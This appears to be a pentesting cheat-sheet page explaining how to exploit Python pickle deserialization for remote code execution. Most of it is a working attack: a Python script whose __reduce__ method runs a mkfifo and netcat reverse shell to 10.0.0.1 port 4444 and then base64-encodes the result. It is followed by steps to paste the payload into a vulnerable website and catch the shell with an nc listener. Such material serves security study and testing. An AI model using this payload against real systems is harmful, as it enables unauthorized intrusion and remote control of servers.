# Python Pickle RCE

The python “pickle” module, that serializes and deserializes a Python object, is vulnerable to remote code execution. If the website uses this module, we may be able to execute arbitrary code.

### Exploitation <a href="#exploitation" id="exploitation"></a>

Below is the Python script (**`mypickle.py`**) to generate the payload to reverse shell.

```
import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4444 > /tmp/f')
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.b64encode(pickled))
    # or
    print(base64.urlsafe_b64encode(pickled))
```

Now run this script to generate the Base64 payload.

```
python3 mypickle.py
```

Copy the ourput base64 string and paste it to where the payload affects in website.\
Before reloading the web page, start a listener in local machine.

```
nc -lvnp 4444
```

Then reload the page. We should get a shell in local terminal.

### References <a href="#references" id="references"></a>

* [David Hamann](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)